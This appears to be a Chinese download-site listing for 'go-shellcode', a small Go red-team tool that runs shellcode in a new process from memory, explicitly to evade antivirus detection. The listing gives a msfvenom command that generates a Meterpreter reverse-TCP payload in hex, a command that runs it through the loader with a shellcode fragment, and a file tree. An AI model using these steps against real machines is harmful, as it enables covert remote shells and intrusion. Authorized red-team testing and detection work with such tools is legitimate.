文件名称:go-shellcode:将Shellcode加载到新进程中
文件大小:4KB
文件格式:ZIP
更新时间:2024-02-26 22:43:05
go windows shellcode post-exploitation redteam
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
【文件预览】:
go-shellcode-master
----go.mod(50B)
----.github()
--------FUNDING.yml(643B)
----README.md(2KB)
----shellcode_unix.go(582B)
----shellcode_windows.go(1KB)
----cmd()
--------sc()